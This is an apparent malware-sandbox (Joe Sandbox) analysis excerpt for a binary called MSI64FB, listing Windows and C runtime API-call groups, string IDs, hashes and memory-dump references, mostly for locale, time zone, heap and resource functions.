                                                                                                                                                                                                                                                    • API String ID: 1239891234-0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                                                                                                                    • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                    • API String ID: 1286766494-4108050209
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2227656907-0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF749F5283B
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                                                                                                                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                    • API String ID: 389471666-631824599
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF749F91F5A
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F91B98: _invalid_parameter_noinfo.LIBCMT ref: 00007FF749F91BAC
                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF749F91F6B
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F91B38: _invalid_parameter_noinfo.LIBCMT ref: 00007FF749F91B4C
                                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF749F91F7C
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F91B68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF749F91B7C
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F8E5C0: HeapFree.KERNEL32(?,?,?,00007FF749F96936,?,?,?,00007FF749F96CB3,?,?,00000000,00007FF749F97239,?,?,?,00007FF749F9716B), ref: 00007FF749F8E5D6
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F8E5C0: GetLastError.KERNEL32(?,?,?,00007FF749F96936,?,?,?,00007FF749F96CB3,?,?,00000000,00007FF749F97239,?,?,?,00007FF749F9716B), ref: 00007FF749F8E5E0
                                                                                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF749F921C6), ref: 00007FF749F91FA3
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3458911817-0
                                                                                                                                                                                                                                                    • Opcode ID: ede5a0b6ed619ab1c9e683908661bffefd74f46d039d7be0245d02b2f95aec8a
                                                                                                                                                                                                                                                    • Instruction ID: 0ec3f919f61a1b915f2e53a5bb94412c01f50b32ca9443847f5706560e61921f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ede5a0b6ed619ab1c9e683908661bffefd74f46d039d7be0245d02b2f95aec8a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F513B36B1C642C6E720FF26E8815B9A771BB49788FC05135EA4D47AD6EF3CE4408760
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateFirstOpenProcessProcess32SnapshotToolhelp32
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3397401024-0
                                                                                                                                                                                                                                                    • Opcode ID: e2a5f8d9e8f60080174f79bf089e6ca0881c36968e936192699cda913d76063d
                                                                                                                                                                                                                                                    • Instruction ID: 3e4fb2673faeb6d18478c98ad57fde4ce190a33678443ae28698308167114865
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2a5f8d9e8f60080174f79bf089e6ca0881c36968e936192699cda913d76063d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6313632A19A4085EB40EF61F8446AAB7B4BB487A8F944234EE6D07BE4DF38D055C710
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2933794660-0
                                                                                                                                                                                                                                                    • Opcode ID: c4d06db6656c5a7f97c831f89d2f69de82a2f983ad5f790ab5c4857bf2cfd4f4
                                                                                                                                                                                                                                                    • Instruction ID: ee04d319ab66994ed257c2478a71e9502bbecdbb266bdc6edbab13e8d24a1ddd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c4d06db6656c5a7f97c831f89d2f69de82a2f983ad5f790ab5c4857bf2cfd4f4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30113022B18F01CAEB00EF64E8542B973B4FB59768F841E31EA6D867A4DF7CD1548350
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LockitLockit::_std::_
                                                                                                                                                                                                                                                    • String ID: 0123456789ABCDEFabcdef-+XxPp$false$gfffffff
                                                                                                                                                                                                                                                    • API String ID: 3382485803-1963183185
                                                                                                                                                                                                                                                    • Opcode ID: d5930b85c512c2f5a709a7304efc8b54f1e46f52a8e9e10162cbe9e8de025b2c
                                                                                                                                                                                                                                                    • Instruction ID: 46188de30abac4bd468dae59bc4d14fda4b85a2093d20fa405338862b30107f8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5930b85c512c2f5a709a7304efc8b54f1e46f52a8e9e10162cbe9e8de025b2c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AAF2CF26A1DA86D9EB50BF19D05017DB3B0FB41B94B959031DE4E077E2DF2DEA61C320
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FormatInfoLocaleMessage
                                                                                                                                                                                                                                                    • String ID: !x-sys-default-locale
                                                                                                                                                                                                                                                    • API String ID: 4235545615-2729719199
                                                                                                                                                                                                                                                    • Opcode ID: 616e43936ec902d1dc742f22eaf0e87de50901db09d4db379d3a225a9463c699
                                                                                                                                                                                                                                                    • Instruction ID: 965527366965815b36e62cda29de62be87127ecd30a0db38e86fa2885be02158
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 616e43936ec902d1dc742f22eaf0e87de50901db09d4db379d3a225a9463c699
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1901C472B1C781D2E711AF52B4047AAE7B1FB947A4F948135DA4907AD6CF3CD6008710
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                    • String ID: $$+xv$0123456789-
                                                                                                                                                                                                                                                    • API String ID: 593203224-2753741353
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: memcpy_s
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1502251526-0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InfoLocale$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4006003004-0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadResource.KERNEL32(?,?,00000001,00007FF749F41B37,?,?,?,00007FF749F41C33,?,?,00000000,00007FF749F4192F), ref: 00007FF749F41B8D
                                                                                                                                                                                                                                                    • LockResource.KERNEL32(?,?,00000001,00007FF749F41B37,?,?,?,00007FF749F41C33,?,?,00000000,00007FF749F4192F), ref: 00007FF749F41B9B
                                                                                                                                                                                                                                                    • SizeofResource.KERNEL32(?,?,00000001,00007FF749F41B37,?,?,?,00007FF749F41C33,?,?,00000000,00007FF749F4192F), ref: 00007FF749F41BAF
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Resource$LoadLockSizeof
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2853612939-0
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                    • String ID: 0123456789ABCDEFabcdef-+XxPp$gfffffff
                                                                                                                                                                                                                                                    • API String ID: 593203224-1108341528
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                    • String ID: 0123456789ABCDEFabcdef-+XxPp$gfffffff
                                                                                                                                                                                                                                                    • API String ID: 593203224-1108341528
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LockitLockit::_std::_
                                                                                                                                                                                                                                                    • String ID: $0123456789-
                                                                                                                                                                                                                                                    • API String ID: 3382485803-700845222
                                                                                                                                                                                                                                                    • Opcode ID: aba340ba283b461763b65234a6a21242df17711b5e95ed629d2949f912da1099
                                                                                                                                                                                                                                                    • Instruction ID: 767e5d65bde41dc4fba44944d08fd89954c29e6f125a795c0666673f59023826
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aba340ba283b461763b65234a6a21242df17711b5e95ed629d2949f912da1099
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9CC27A22A0CB46C9EB54BF65D4901BDA7B1FB55B88B945032DE4E07BE4DF39D892C320
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                    • String ID: $0123456789-
                                                                                                                                                                                                                                                    • API String ID: 593203224-700845222
                                                                                                                                                                                                                                                    • Opcode ID: ea1a7ed0626354bfb375fefa4a324b1dbd37c26bc19b7b9889c2d71dd7992db5
                                                                                                                                                                                                                                                    • Instruction ID: 89041725b8569322853a5cd34b8ca67f69c2649cbb587c2bfb3992740ba12caa
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ea1a7ed0626354bfb375fefa4a324b1dbd37c26bc19b7b9889c2d71dd7992db5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 61C28B22A0CA81D9EB14AF65D4903BCAB71FB44B88F944071EA4E477E5DF7DE895C320
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,?,?,?,?,00007FF749F8D666), ref: 00007FF749F914A9
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F90F78: VirtualProtect.KERNELBASE ref: 00007FF749F91095
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F90F78: VirtualProtect.KERNELBASE ref: 00007FF749F910C6
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ProtectVirtual$InfoLocale
                                                                                                                                                                                                                                                    • String ID: GetLocaleInfoEx
                                                                                                                                                                                                                                                    • API String ID: 3721377114-2904428671
                                                                                                                                                                                                                                                    • Opcode ID: 25b3afd9655becdbee3a8b4e2ede03475dff7eafed07b1e7d8d320d88777900e
                                                                                                                                                                                                                                                    • Instruction ID: e953f141ea2e4cca0557d952bd7c39a1d29ad1f6e61bee0f29577e2406b08a25
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 25b3afd9655becdbee3a8b4e2ede03475dff7eafed07b1e7d8d320d88777900e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD016121B0C646C1EB40BF1AA4005A9E7B1AF9ABE0FA84635DE2C177E5DE3CD5018250
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1283921372-0
                                                                                                                                                                                                                                                    • Opcode ID: 8683fda1d7f2cf2fe16f18fd1a6c84b59257381d174357920ff1f712dcc13dc6
                                                                                                                                                                                                                                                    • Instruction ID: a96c7403251c1fa2006aa8edc16eae921e57b0bef0d5608b8ac7c164ff34f792
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8683fda1d7f2cf2fe16f18fd1a6c84b59257381d174357920ff1f712dcc13dc6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B021062F18A84CAFB10AF65D8507FDA371AB547E8F844731EE5C67ADADE2CD2418310
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1283921372-0
                                                                                                                                                                                                                                                    • Opcode ID: 97489fdd0152be2848b87501ab8184f999298cc24e0216d922afc6907825dde9
                                                                                                                                                                                                                                                    • Instruction ID: 338c1e6bc19a7db6e258b41e8d3577a72d5a30e003b2feb87dcd6736929165f2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 97489fdd0152be2848b87501ab8184f999298cc24e0216d922afc6907825dde9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C2020162F18A848AFB10AF65D8507FDA3B1AB557D8F804331EE5C27BD9EE2CD5418310
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: a/p$am/pm
                                                                                                                                                                                                                                                    • API String ID: 0-3206640213
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: e+000$gfff
                                                                                                                                                                                                                                                    • API String ID: 0-3030954782
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                    • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                                                                                                                                                                    • API String ID: 593203224-2799312399
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LockitLockit::_std::_
                                                                                                                                                                                                                                                    • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                                                                                                                                                                    • API String ID: 3382485803-2799312399
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                    • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                                                                                                                                                                    • API String ID: 593203224-2799312399
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Info
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1807457897-0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LockitLockit::__invalid_parameter_noinfo_noreturnstd::_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3145298356-0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionRaise
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3997070919-0
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                    • API String ID: 0-4108050209
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2299586839-0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF749F98725,00000000,00000092,?,?,00000000,?,?,00007FF749F8D493), ref: 00007FF749F97FB6
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: EnumLocalesSystem
